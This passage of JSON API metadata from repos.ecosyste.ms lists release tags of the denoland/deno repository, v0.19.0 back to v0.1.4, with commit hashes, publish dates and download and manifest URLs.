.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":